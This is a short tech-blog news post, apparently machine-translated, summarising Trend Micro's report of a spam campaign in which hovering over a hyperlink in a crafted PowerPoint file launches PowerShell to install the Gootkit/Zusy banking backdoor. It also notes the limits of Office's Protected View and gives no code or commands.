It’s just a mouseover and malware does damage: new threat to PowerPoint

Trend Micro security researchers have identified a new malware attack that hits the user when he passes the mouse pointer over a linked link to a suitably modified PowerPoint file, even without making any clicks. This is a method that was used in a spam campaign with the attempt to install a backdoor bank fraud known to Zusy, OTLARD or Gootkit.

Malware is significant because it is not based on macros, Visual Basic or JavaScript scripts that are normally widely used and often lead to threat recognition before it can do damage. The technique instead uses the Windows PowerShell tool, which is invoked when the target moves the mouse pointer over a hyperlink within a PowerPoint document.

 

Source: TrendMicro
Protected View mode, present in the latest versions of Microsoft Office, can offer the user a first warning. However, this is a countermeasure whose effectiveness may be particularly low as the user can be induced to disable the mode (which for example does not work when the documents are printed or edited) or, as in the case of less experienced users, a Superficial click on “Enable” also drops this last possible barrier to infection. Protected View Mode is also not available in old versions of Office.

As mentioned above, this new threat has been used in a spam campaign launched towards the end of May. Spam campaigns with bad attachments often hit with a firepower of tens of millions of messages in a few hours.

Sent messages are characterized by items such as Purchase Order, Invoice, and Confirmation, and obviously include a PowerPoint file called in several ways. The peak of the campaign was found on May 25th with 1444 surveys. At present, it is unclear what the rate of effectiveness of this technique may be, but a 0.5% rate could pose a major threat to companies and individuals around the world, especially those who use old versions Of Office.

On the Trend Micro official blog, you can find a detailed technical analysis of the threat at this address.

Selina

Selina

I breathe tech! Want to get me to talk about something else? Then try movies.

Leave a Response